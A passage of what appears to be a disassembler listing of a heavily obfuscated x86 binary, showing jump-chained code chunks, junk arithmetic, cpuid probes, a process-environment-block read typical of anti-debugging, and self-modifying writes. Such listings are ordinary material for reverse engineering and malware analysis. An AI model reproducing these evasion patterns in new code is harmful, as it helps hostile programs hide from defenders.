sub edi, 9E52B43Ah
jmp loc_423C06
; END OF FUNCTION CHUNK FOR sub_423F02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA3D
loc_42CE7D: ; CODE XREF: sub_42FA3D:loc_42BB0A�j
and eax, 0D65C675h
add eax, 8FE0A15Dh
add eax, ebp
push offset sub_42BE29
jmp nullsub_148
; END OF FUNCTION CHUNK FOR sub_42FA3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42CE95: ; CODE XREF: sub_42BB83-7BCA�j
xchg edi, eax
push edi
jmp loc_424EAC
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
loc_42CE9D: ; DATA XREF: sub_427D3A-3324�o
mov [ebx], eax
pop ebx
push esi
pushf
push 1F321AF0h
pop esi
xor esi, 9B288B30h
and esi, 0D48A4A7Fh
jmp loc_429BB2
; ---------------------------------------------------------------------------
and ebx, esi
sub edi, 7716ADF3h
jmp sub_427DDA
; ---------------------------------------------------------------------------
loc_42CEC6: ; DATA XREF: sub_426BF7+64E3�o
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jnz loc_42A5DD
mov eax, [ebp-4]
cmp word ptr [eax], 2ECDh
jmp loc_429352
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_42CEE2: ; CODE XREF: sub_42AA9B+428A�j
mov ebp, ebx
xchg ebp, [esp+0Ch+var_C]
push 15C61E21h
call sub_427D3A
loc_42CEF1: ; CODE XREF: sub_42BE29-189B�j
jmp loc_425411
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
loc_42CEF6: ; CODE XREF: _7hdaygc1:00428AB7�j
jmp loc_42DA27
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266F8
loc_42CEFC: ; CODE XREF: sub_4266F8:loc_424733�j
push 50CF2C1Ah
pop eax
sub eax, 0A3C858CBh
add eax, 533B85EBh
; END OF FUNCTION CHUNK FOR sub_4266F8
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42CF0E: ; CODE XREF: sub_423DDB+B982�j
xchg eax, [esp+0]
jmp loc_42E819
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42CF16: ; CODE XREF: sub_425C3B+3F7D�j
jz loc_42A919
mov ecx, esi
adc ebp, edx
mov ecx, 6DE502B0h
jmp loc_42A911
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42CF2A: ; CODE XREF: sub_424F62+988E�j
jz loc_42C4D9
loc_42CF30: ; CODE XREF: sub_424F62:loc_42AC5B�j
rol eax, 0Eh
xor eax, 99932093h
cpuid
jmp loc_42A6F3
; END OF FUNCTION CHUNK FOR sub_424F62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428498
loc_42CF41: ; CODE XREF: sub_428498+17�j
jnz loc_42DF67
jmp loc_426C40
; END OF FUNCTION CHUNK FOR sub_428498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42CF4C: ; CODE XREF: sub_42524F+8425�j
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
push eax
push 0C30E33D8h
jmp loc_42907C
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
loc_42CF60: ; CODE XREF: _7hdaygc1:00428186�j
jge loc_42F17A
shr edx, 6
cdq
jmp loc_4281EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42CF6F: ; CODE XREF: sub_42C443:loc_425687�j
sbb edx, 384BDDCCh
jge loc_42A9D3
shr ebp, 1Ch
cmp edi, 56005127h
jmp loc_42CDC2
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269CB
loc_42CF89: ; CODE XREF: sub_4269CB:loc_424BE1�j
and ecx, eax
mov ebx, edi
jmp loc_426174
; END OF FUNCTION CHUNK FOR sub_4269CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42CF92: ; CODE XREF: sub_42C443-10D3�j
sbb esi, 91B59BDAh
loc_42CF98: ; CODE XREF: _7hdaygc1:loc_423223�j
cmp ebx, 69727943h
jnz loc_42E845
jmp loc_42BF45
; ---------------------------------------------------------------------------
loc_42CFA9: ; CODE XREF: sub_42C443:loc_42876A�j
push offset loc_42998B
jmp nullsub_140
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42CFB3: ; CODE XREF: sub_423172+AB�j
; sub_423172+BF1E�j
xor esi, 825C5F1Ch
and esi, 7E7E1117h
add esi, 810A3E9Bh
xor esi, 7F0A95DFh
add eax, esi
pop esi
loc_42CFCE: ; CODE XREF: _7hdaygc1:loc_4268D2�j
mov eax, [eax]
mov ecx, 0Ah
jmp loc_425F3A
; END OF FUNCTION CHUNK FOR sub_423172
; =============== S U B R O U T I N E =======================================
sub_42CFDA proc near ; CODE XREF: sub_42CCFE-3DC6�p
; _7hdaygc1:0042C257�j
; FUNCTION CHUNK AT 00423AA9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424850 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428A9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429571 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004296A7 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004298CA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00429E58 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042AC6E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042C6C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FC1D SIZE 00000010 BYTES
xchg eax, [esp+0]
pop eax
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jmp loc_42C6C5
sub_42CFDA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or edx, 0B00C85CDh
sub esi, edx
jmp sub_4272FB
; ---------------------------------------------------------------------------
loc_42CFF7: ; CODE XREF: _7hdaygc1:004250FD�j
jnz loc_42EF26
jmp loc_42E418
; =============== S U B R O U T I N E =======================================
sub_42D002 proc near ; CODE XREF: _7hdaygc1:0042F33B�j
; sub_4291EA+67D4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423B8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423EB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424176 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004249B6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425C4F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042651E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004283FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428D5B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B2C9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042DE81 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E233 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EF0B SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg edi, [esp-4+arg_0]
call sub_42BD03
loc_42D00E: ; CODE XREF: sub_42986C-65DA�j
jl loc_426524
xchg edx, ebp
jmp loc_425C4F
sub_42D002 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42D01B proc near ; CODE XREF: _7hdaygc1:loc_428DA3�p
; _7hdaygc1:0042C49D�j
; FUNCTION CHUNK AT 00427C88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D81F SIZE 0000000E BYTES
xchg edx, [esp+0]
pop edx
push ebx
push 2F61534Ah
pop ebx
xor ebx, 9912CF66h
jmp loc_427C88
sub_42D01B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42D031 proc near ; CODE XREF: sub_425D3F+7�p
; _7hdaygc1:0042702F�j
xchg esi, [esp+0]
pop esi
push esi
mov esi, ebp
xchg esi, [esp+0]
push offset sub_42F042
jmp nullsub_53
sub_42D031 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42D045: ; CODE XREF: sub_42C16F-67D8�j
ror eax, 1Eh
pushf
jmp loc_424906
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_42D04E: ; CODE XREF: _7hdaygc1:0042FB60�j
ja nullsub_177
; =============== S U B R O U T I N E =======================================
sub_42D054 proc near ; CODE XREF: sub_42F042+2�p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg ebp, [esp-4+arg_0]
retn
sub_42D054 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D48F
loc_42D05C: ; CODE XREF: sub_42D48F+17�j
jmp loc_4238C5
; END OF FUNCTION CHUNK FOR sub_42D48F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42D061: ; CODE XREF: sub_42F65A-4EEA�j
jmp loc_42DB65
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_42D066: ; CODE XREF: sub_42B74A-725D�j
jmp loc_426FDB
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
locret_42D06B: ; CODE XREF: _7hdaygc1:004247DE�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_42D06C: ; CODE XREF: sub_4270E6-2B45�j
jmp loc_42516A
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
loc_42D071: ; CODE XREF: _7hdaygc1:004293A2�j
mov edi, ebp
; =============== S U B R O U T I N E =======================================
sub_42D073 proc near ; CODE XREF: sub_42F9D2-C121�p
; FUNCTION CHUNK AT 004238B6 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov ecx, [ebx+edx-4]
or ecx, ecx
loc_42D07D: ; CODE XREF: sub_425735:loc_42B7FB�j
jz loc_427E44
mov ebx, [ebx+ecx]
call sub_42B9E1
jmp loc_4238B6
sub_42D073 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D090: ; CODE XREF: _7hdaygc1:0042A30A�j
mov edx, [ebp-4]
call sub_4291CE
push offset sub_42874A
jmp loc_4262B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF77
loc_42D0A2: ; CODE XREF: sub_42EF77+F�j
mov eax, [ebp-20h]
mov byte ptr [eax], 0
inc dword ptr [ebp-1Ch]
jmp loc_42FC90
; END OF FUNCTION CHUNK FOR sub_42EF77
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42525E
loc_42D0B0: ; CODE XREF: sub_42525E+4�j
inc dword ptr [ebp-1Ch]
jmp loc_423DA9
; END OF FUNCTION CHUNK FOR sub_42525E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42D0B8: ; CODE XREF: sub_424963+BF3�j
; sub_424963+7432�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-24h]
jnz loc_42D532
jmp loc_42B644
; END OF FUNCTION CHUNK FOR sub_424963
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42D0CA: ; CODE XREF: sub_426130+7278�j
jmp loc_42C46C
; END OF FUNCTION CHUNK FOR sub_426130
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_42D0D0: ; CODE XREF: sub_4268D9+D�j
jmp loc_42C09D
; END OF FUNCTION CHUNK FOR sub_4268D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BF7
loc_42D0D5: ; CODE XREF: sub_42C119-4395�j
; sub_426BF7+5B92�j
mov eax, [ebp-4]
mov al, [eax]
push offset loc_42CEC6
jmp loc_4258B4
; END OF FUNCTION CHUNK FOR sub_426BF7
; ---------------------------------------------------------------------------
loc_42D0E4: ; CODE XREF: _7hdaygc1:00429067�j
and ecx, eax
jnp loc_429EED
jmp loc_42B891
; ---------------------------------------------------------------------------
push offset sub_42B907
jmp loc_42BDFD
; =============== S U B R O U T I N E =======================================
sub_42D0FB proc near ; CODE XREF: _7hdaygc1:00424D4F�j
; sub_423648+9403�p
; FUNCTION CHUNK AT 0042F127 SIZE 00000015 BYTES
xchg eax, [esp+0]
pop eax
movzx edx, byte ptr [edx]
or eax, edx
mov [ebp-1Ch], eax
jmp loc_42F127
sub_42D0FB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42D10C: ; CODE XREF: sub_423648+219C�j
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
loc_42D112: ; CODE XREF: sub_423648:loc_426E7B�j
; _7hdaygc1:00427181�j ...
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
jmp loc_42FB1C
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42D11D: ; CODE XREF: sub_424AE1:loc_42990A�j
mov eax, 7603EAC4h
jmp loc_425FAD
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
locret_42D127: ; CODE XREF: _7hdaygc1:00426F41�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A401
loc_42D128: ; CODE XREF: sub_42A401+16�j
jmp loc_42D24D
; END OF FUNCTION CHUNK FOR sub_42A401
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_42D12D: ; CODE XREF: sub_42C209:loc_429244�j
ror edi, 12h
not ebp
add ebp, 0CE4312D7h
sbb eax, 0E6666ED6h
jmp loc_428DC3
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
loc_42D143: ; CODE XREF: _7hdaygc1:loc_4288F9�j
push esi
mov esi, eax
loc_42D146: ; CODE XREF: _7hdaygc1:004247E5�j
xchg esi, [esp]
mov eax, [ebp-5Ch]
jmp loc_429D10
; ---------------------------------------------------------------------------
add eax, edx
jmp sub_426F53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42D158: ; CODE XREF: sub_42C16F-827A�j
mov eax, [eax]
shl eax, 3
push 97B1B9D0h
xchg ecx, [esp+4+var_4]
mov edx, ecx
pop ecx
jmp loc_4280CA
; END OF FUNCTION CHUNK FOR sub_42C16F
; =============== S U B R O U T I N E =======================================
sub_42D16D proc near ; CODE XREF: _7hdaygc1:00425830�j
; sub_424B63+21DE�p
; FUNCTION CHUNK AT 0042F9E5 SIZE 00000011 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jle loc_42C78F
jmp loc_42F9E5
sub_42D16D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_42D183: ; CODE XREF: sub_42BAE7:loc_426A58�j
test ecx, 4000h
jmp loc_423123
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
xchg edx, ebx
jmp sub_42809F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42D195: ; CODE XREF: sub_423DFC:loc_42DDAB�j
sbb ecx, eax
sub ebx, 2229AF9Fh
popf
push 7416A041h
adc ecx, 0C03A8A29h
jmp loc_4269F4
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
loc_42D1AE: ; CODE XREF: _7hdaygc1:loc_428D85�j
push offset loc_426838
jmp locret_42DC30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42581B
loc_42D1B8: ; CODE XREF: sub_42581B+A�j
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_42619E
mov eax, [ebp+8]
push eax
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
setz al
jmp loc_424814
; END OF FUNCTION CHUNK FOR sub_42581B
; ---------------------------------------------------------------------------
xchg ebp, [esi]
jmp sub_42681B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428613
loc_42D1E2: ; CODE XREF: sub_428613:loc_42C14E�j
push 1F18A519h
pop edx
rol edx, 1Ah
xor edx, 0D45C52FFh
rol edx, 12h
jmp loc_423864
; END OF FUNCTION CHUNK FOR sub_428613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42D1F9: ; CODE XREF: sub_42DD73-2E38�j
jbe loc_425869
loc_42D1FF: ; CODE XREF: sub_42DD73:loc_42AC22�j
add edx, 5AAAC43Fh
and edx, 95F3243Dh
xor edx, 671410C8h
jmp loc_423F49
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42742E
loc_42D216: ; CODE XREF: sub_42742E+C�j
; sub_424755+689E�j
rol eax, 0Eh
push eax
call sub_42B650
retn
; END OF FUNCTION CHUNK FOR sub_42742E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_42D220: ; CODE XREF: sub_4282A9+12�j
jmp loc_42FACE
; END OF FUNCTION CHUNK FOR sub_4282A9
; ---------------------------------------------------------------------------
loc_42D225: ; CODE XREF: _7hdaygc1:0042A56C�j
mov eax, [ebp-38h]
call sub_4289CE
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42D22D: ; CODE XREF: sub_4253A0+155D�j
jmp loc_42AEA7
; END OF FUNCTION CHUNK FOR sub_4253A0
; =============== S U B R O U T I N E =======================================
sub_42D232 proc near ; CODE XREF: _7hdaygc1:00429941�j
; sub_42AA47+CAF�p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
add edx, 5F629FD9h
xchg edx, [esp-4+arg_0]
jmp sub_42C1AF
sub_42D232 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D244: ; CODE XREF: _7hdaygc1:0042B27B�j
pushf
; =============== S U B R O U T I N E =======================================
sub_42D245 proc near ; CODE XREF: sub_4237DA+A036�p
; FUNCTION CHUNK AT 00429B19 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042A6B8 SIZE 0000000B BYTES
xchg ecx, [esp+0]
pop ecx
shl dword ptr [ebp-8], 8
loc_42D24D: ; CODE XREF: sub_42A401:loc_42D128�j
; sub_42D744+3�j
jb loc_42A6B8
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jmp loc_42C2F6
sub_42D245 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42D25E: ; CODE XREF: _7hdaygc1:loc_42965A�j
retn
; ---------------------------------------------------------------------------
loc_42D25F: ; DATA XREF: sub_424963:loc_429BA3�o
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
jmp loc_4285D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_42D26D: ; CODE XREF: sub_4291A3:loc_42E1EC�j
pushf
push offset loc_42E2CE
jmp loc_427E22
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_42D278: ; CODE XREF: sub_42ABF7:loc_42FD9F�j
; DATA XREF: sub_42655C:loc_425A20�o
adc edx, [esp+arg_0]
; END OF FUNCTION CHUNK FOR sub_42ABF7
; START OF FUNCTION CHUNK FOR sub_42CB85
loc_42D27C: ; CODE XREF: sub_42CB85:loc_42CB91�j
add esp, 8
mov [ebp-4], eax
jmp loc_42ECBB
; END OF FUNCTION CHUNK FOR sub_42CB85
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D287 proc near ; CODE XREF: sub_424B63+21D9�p
; sub_424B63+9F88�p
; FUNCTION CHUNK AT 00425D50 SIZE 0000000A BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFD8h
jmp loc_425D50
sub_42D287 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42D292: ; CODE XREF: sub_42EBD6-8320�j
mov eax, [ecx]
loc_42D294: ; CODE XREF: sub_42EBD6:loc_42FBEC�j
cmp ebx, 69727943h
jnz loc_426F9F
jmp loc_42847A
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42450E
loc_42D2A5: ; CODE XREF: sub_42450E:loc_42F460�j
call sub_428A2D
loc_42D2AA: ; DATA XREF: sub_42F979+D�o
cmp dword ptr [ebp-8], 0
jbe loc_424FD0
jmp loc_426104
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
dec eax
mov edx, ds:dword_42BC58
loc_42D2C0: ; CODE XREF: _7hdaygc1:loc_42DC63�j
mov [edx], eax
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_42D2C2: ; CODE XREF: _7hdaygc1:00423A24�j
; sub_42AA9B:loc_429A1B�j
push offset loc_426DA8
jmp loc_42A653
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42986C
loc_42D2CC: ; CODE XREF: sub_42986C+6F2�j
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_429873
retn
; END OF FUNCTION CHUNK FOR sub_42986C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42D2D8: ; CODE XREF: sub_42C443-61EE�j
jmp loc_42642A
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42450E
loc_42D2DD: ; CODE XREF: sub_42450E+AC8�j
jmp loc_4287C8
; END OF FUNCTION CHUNK FOR sub_42450E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42D2E2: ; CODE XREF: sub_423648+596�j
jmp loc_42FA7C
; END OF FUNCTION CHUNK FOR sub_423648
; =============== S U B R O U T I N E =======================================
sub_42D2E7 proc near ; CODE XREF: sub_425BFC+693A�p
push ebx
push ecx
mov eax, large fs:30h
push offset loc_42486A
jmp nullsub_58
sub_42D2E7 endp
; ---------------------------------------------------------------------------
jno loc_42BE0C
add ebx, eax
mov eax, ds:dword_42BC58
mov [eax], ebx
jmp loc_42EEB2
; =============== S U B R O U T I N E =======================================
sub_42D30E proc near ; CODE XREF: sub_4290DB+3�j
; FUNCTION CHUNK AT 00425691 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004283BA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042CA1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EAB0 SIZE 00000019 BYTES
add esp, 0FFFFFFA0h
lea eax, sub_4290DB
mov [ebp-8], eax
push 1Ch
lea eax, [ebp-60h]
push edi
mov edi, eax
jmp loc_425691
sub_42D30E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shr edi, 18h
jmp sub_42DEA0
; ---------------------------------------------------------------------------
loc_42D32F: ; DATA XREF: _7hdaygc1:00425B2B�o
xchg edi, [esp]
jmp loc_42DE41
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_42D338: ; CODE XREF: sub_42874A:loc_42676E�j
and esi, 85AED504h
add esi, 0FABE60E9h
xchg esi, [esp+0]
jmp sub_42B32F
; END OF FUNCTION CHUNK FOR sub_42874A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_42D34C: ; CODE XREF: sub_42B74A:loc_4246AB�j
push ecx
mov ecx, eax
xchg ecx, [esp+0]
call sub_42B470
jmp loc_427CC1
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42D35C: ; CODE XREF: sub_425E64:loc_424B82�j
; sub_425E64+9AAA�j
push 6176C855h
pop eax
sub eax, 9946FAFBh
jnz loc_42DAA4
loc_42D36E: ; CODE XREF: sub_423752+5D02�j
jmp loc_42DB23
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
cdq
jle loc_427CD2
jmp loc_42DA9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42D37F: ; CODE XREF: sub_426130+7E83�j
push offset sub_424E42
jmp loc_42978D
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_42D389: ; CODE XREF: sub_423F02-DC3�j
jz sub_423C08
jmp loc_42311E
; END OF FUNCTION CHUNK FOR sub_423F02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB61
loc_42D394: ; CODE XREF: sub_42BB61:loc_42F996�j
xchg edx, [esp+4+var_4]
jmp loc_426FAA
; END OF FUNCTION CHUNK FOR sub_42BB61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42D39C: ; CODE XREF: sub_426130:loc_4288F4�j
sub edx, 107B0B1h
test edx, 4000h
jmp loc_42D0CA
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEC6
loc_42D3AD: ; CODE XREF: sub_42BEC6:loc_4237C4�j
jnz loc_425909
adc ebx, edi
jmp loc_42968C
; END OF FUNCTION CHUNK FOR sub_42BEC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42D3BA: ; CODE XREF: sub_42DD73-A5F3�j
sub ebx, 0E09DFC90h
test ecx, edi
jmp loc_4273F4
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42D3C7: ; CODE XREF: sub_424963+9F34�j
adc ebp, eax
jg loc_42C1B9
popf
mov [esi], ebx
loc_42D3D2: ; CODE XREF: sub_424963:loc_42D543�j
mov eax, offset dword_42E198
push 0FF52DE5Eh
pop edx
and edx, ds:4000F3h
jmp loc_42B40B
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42D3E8: ; CODE XREF: sub_4232C2+AF9E�j
pop ecx
or ebp, esi
sub ebp, eax
jmp loc_42E676
; END OF FUNCTION CHUNK FOR sub_4232C2
; =============== S U B R O U T I N E =======================================
sub_42D3F2 proc near ; DATA XREF: sub_42936E+377�o
; FUNCTION CHUNK AT 004233F6 SIZE 00000010 BYTES
xchg ebx, [esp+0]
call sub_423410
mov al, 1
xchg edi, [esp+0]
mov edx, edi
pop edi
call edx
xor eax, eax
jmp loc_4233F6
sub_42D3F2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D40B: ; CODE XREF: _7hdaygc1:0042F3C3�j
rol edi, 10h
test edi, 1000h
jmp loc_42B07D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42D41A: ; CODE XREF: sub_4291EA+62B�j
jmp sub_42A94C
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42948A
loc_42D41F: ; CODE XREF: sub_42948A:loc_42FBB6�j
mov [edi], esi
pop edx
jmp loc_42ACA2
; END OF FUNCTION CHUNK FOR sub_42948A
; ---------------------------------------------------------------------------
xchg ebx, [edi]
jmp sub_42655C
; ---------------------------------------------------------------------------
locret_42D42E: ; CODE XREF: _7hdaygc1:0042DA32�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42D42F: ; CODE XREF: sub_4288C7+2941�j
; sub_4232DA:loc_42BF5B�j
jmp loc_429BBD
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42D434: ; CODE XREF: sub_4232C2+804C�j
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
and edx, 0FFFFFDFFh
xor [esi], edx
jmp loc_42B9FB
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDA
loc_42D44C: ; CODE XREF: sub_42BEDA-2CD�j
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
jmp loc_424DFB
; END OF FUNCTION CHUNK FOR sub_42BEDA
; ---------------------------------------------------------------------------
push ecx
mov ecx, ebp
xchg ecx, [esp]
mov ebp, esp
add esp, 0FFFFFFCCh
jmp loc_42E5A4
; ---------------------------------------------------------------------------
